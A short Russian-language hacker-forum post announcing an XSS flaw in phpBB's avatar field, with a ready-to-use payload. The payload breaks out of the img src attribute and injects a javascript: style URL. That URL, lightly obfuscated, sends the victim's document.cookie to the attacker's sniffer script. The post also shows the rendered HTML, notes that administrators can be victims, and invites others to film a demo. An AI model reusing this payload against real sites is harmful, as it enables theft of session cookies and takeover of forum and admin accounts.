Короче так...
Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается Инфы об этом XSS ни где не встречал, поэтому можно считать новой

XSS такой:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
где [target] - url на реальную картинку
localhost - url снифера

В ответ от сервера получаем в html-тегах:
<img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" />

таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу

з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex.
С ув., Йа ))